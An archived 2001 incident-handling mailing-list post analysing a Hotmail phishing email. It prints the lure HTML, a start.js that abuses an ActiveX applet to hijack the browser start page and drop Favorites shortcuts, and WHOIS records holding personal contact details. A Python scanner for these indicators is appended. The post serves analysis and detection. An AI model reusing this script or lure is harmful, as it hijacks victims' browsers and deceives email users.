quentynat_private wrote:
>
> there appears to be a new hotmail malware thingy it is sent from
> admin02at_private with the subject line of Password Change
>
> wonder how many people it will get before all the sites are closed?
>
> Detail -
>
> I just received this mail from 202.104.122.157 [1]
>
> #START
>
> >From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700
> Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id
> MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700
> Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
> From: admin02at_private
> To: ${MYEMAIL}@hotmail.com
> Subject: Password Change
> Date: Sat, 8 Sep 2001 08:13:32
> Mime-Version: 1.0
> Content-Type: text/html; charset="DEFAULT_CHARSET"
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 5.00.2919.6700
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
>
> <HTML>
>
> <HEAD>
>
> </HEAD>
>
> <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B"
> ALINK="#FF0000">
> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change
> Confirmation</B></FONT>
> </P>
> <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully
> changed. Please remember your new Password.
> </B></FONT></P>
> <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A
> HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this
> please
> click here to restore your old password.</A></FONT> </P>
> </BODY>
> </HTML>
>
> #END
>
> now going to maeveshomepage.com/ty.htm [2] in opera shows
>
> #START
>
> <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO
> 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
>
> <HTML>
>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
>
> <BODY BGCOLOR="#336699">
> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
> <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been
> restored.</FONT> <SCRIPT SRC="start.js">
> </SCRIPT>
> </P>
> </BODY>
> </HTML>
>
> #END
>
> and looking at start.js (the interesting bit)
>
> #START
>
> document.write("<APPLET HEIGHT=0 WIDTH=0
> code=com.ms.activeX.ActiveXComponent></APPLET>")
>
> function AddFavLnk(loc, DispName, SiteURL)
> {
>   var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
>   Shor.TargetPath = SiteURL;
>   Shor.Save();
> }
>
> function f(){
>   try
>   {
>     a1=document.applets[0];
>     a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
>     a1.createInstance();
>     Shl = a1.GetObject();
>     a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
>     a1.createInstance();
>     FSO = a1.GetObject();
>     a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
>     a1.createInstance();
>     Net = a1.GetObject();
>     try{
>       var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
>       document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
>       //////////////////////////////// home page
>       Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
>       var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
>       document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
>       var WF, Shor, loc;
>       WF = FSO.GetSpecialFolder(0);
>       loc = WF + "\\Favorites";
>       if(!FSO.FolderExists(loc))
>       {
>         loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
>         if(!FSO.FolderExists(loc))
>         {
>           return;
>         }
>       }
>       //////////////////////////////// favorites
>       AddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com");
>       AddFavLnk(loc, " Aol", "http://www.aol.com");
>     }
>     catch(e){ }
>   }
>   catch(e){ }
> }
>
> function init(){
>   setTimeout("f()", 1000);
> }
>
> init();
>
> #END
>
> it appears to set your default home page to http://yahhooo.devil.ru/ [3]
> and get your favorites (which may contain saved usernames and passwords)
>
> anybody got anything further?
>
> Q
>
> Notes
>
> [1] - inetnum: 202.104.122.128 - 202.104.122.159
> netname: SHENZHEN-JLXXCY-INFOR-LTD
> descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
> country: CN
> admin-c: HB58-AP
> tech-c: HB58-AP
> mnt-by: MAINT-CHINANET-GD
> changed: ipadmat_private 20000920
> source: APNIC
>
> person: HU BOG
> address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
> country: CN
> phone: +86-755-3521135
> fax-no: +86-755-3396971
> e-mail: ipuserat_private
> nic-hdl: HB58-AP
> mnt-by: MAINT-CHINANET-GD
> changed: ipadmat_private 20000920
> source: APNIC
>
> [2] - Registrant:
> JBO
> 223 S. 5th
> usa, O ---
> US
>
> Domain Name: MAEVESHOMEPAGE.COM
>
> Administrative Contact:
> I, TJ bwestbyat_private
> 223 S. 5th
> usa, O ---
> US
> 1115551212
>
> Technical Contact:
> I, TJ bwestbyat_private
> 223 S. 5th
> usa, O ---
> US
> 1115551212
>
> Billing Contact:
> I, TJ bwestbyat_private
> 223 S. 5th
> usa, O ---
> US
> 1115551212
>
> Record last updated on 11-Jul-2001.
> Record expires on 07-May-2002.
> Record Created on 07-May-2001.
>
> Domain servers in listed order:
> NS1.VEGASSECURE.NET 208.50.15.6
> NS2.VEGASSECURE.NET 208.50.15.7
>
> [3] - domain: DEVIL.RU
> type: CORPORATE
> admin-o: AK2000-RIPN
> nserver: ns.kravchenko.ru.
> nserver: srvr.list.ru.
> created: 07-AUG-2000
> state: Delegated
> changed: 19-MAY-2001
> mnt-by: ANDRIUSHA-MNT-RIPN
> source: RIPN
>
> person: Andrey S Kravchenko
> nic-hdl: AK2000-RIPN
> address: Teatralny st 23a/30,
> address: Donetsk, Ukraine, 340100
> phone: +7 902 6010000
> fax-no: +7 902 6010000
> e-mail: andreyat_private
> changed: 18-AUG-2000
> mnt-by: ANDRIUSHA-MNT-RIPN
> source: RIPN
>
> --
> #####################
> Quentyn Taylor
> Sysadmin - Fotango
> #####################
> You're damn right we need a rational code of morality and ethics. But
> not much progress can
> be made in that direction while we've still got a majority ranting about
> gods, devils, souls, and
> absolute morality, and using an ancient book written by ignorant nomads
> as a guide.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
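A small content scanner for the start.js pattern quoted in the post above, added here as an example and not part of the original message or of any list member's code: it flags the hidden com.ms.activeX.ActiveXComponent applet, the scripting CLSIDs the script instantiates through it, the Internet Explorer Start Page registry write and the Favorites shortcut drop, and calls a document malicious when the applet is combined with any scripting CLSID. The sample inputs are constructed from the quoted script; the CLSID-to-name mapping is the standard registration of those GUIDs, not something the post states.

```python
import re

# Constructed sample: the relevant lines of the start.js quoted in the post.
SAMPLE_START_JS = r'''
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject();
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
'''
# Constructed benign page: an ordinary applet that fetches no scripting objects.
BENIGN_HTML = '<HTML><BODY><APPLET code=com.example.Clock></APPLET></BODY></HTML>'

# CLSIDs as they appear in the posted script. In the script the objects fetched
# under them do registry writes, file/folder operations and read the user name.
SCRIPTING_CLSIDS = {
    "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Shell",
    "{0D43FE01-F093-11CF-8940-00A0C9054228}": "Scripting.FileSystemObject",
    "{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Network",
}

# Behavioural indicators taken from the posted script, reported in this order.
RULES = [
    ("hidden-activex-applet",
     re.compile(r"<APPLET[^>]*code\s*=\s*com\.ms\.activeX\.ActiveXComponent", re.I)),
    ("ie-startpage-regwrite",
     re.compile(r"RegWrite.*?Internet Explorer\\+Main\\+Start\s*Page", re.I | re.S)),
    ("favorites-shortcut-drop",
     re.compile(r"CreateShortcut\s*\(.*?\.URL", re.I | re.S)),
]
CLSID_CALL = re.compile(r'setCLSID\s*\(\s*"(\{[0-9A-Fa-f-]+\})"')


def scan(content):
    """Return the indicator names found in one HTML/JS document, in report order."""
    hits = [name for name, pat in RULES if pat.search(content)]
    for clsid in CLSID_CALL.findall(content):
        hits.append("clsid:" + SCRIPTING_CLSIDS.get(clsid.upper(), "unknown"))
    return hits


def is_malicious(hits):
    """The hidden applet plus any scripting CLSID is the combination the post shows."""
    return "hidden-activex-applet" in hits and any(h.startswith("clsid:") for h in hits)


if __name__ == "__main__":
    for label, doc in (("start.js", SAMPLE_START_JS), ("benign", BENIGN_HTML)):
        found = scan(doc)
        print(label, "MALICIOUS" if is_malicious(found) else "clean", found)
```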
This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 13:17:10 PDT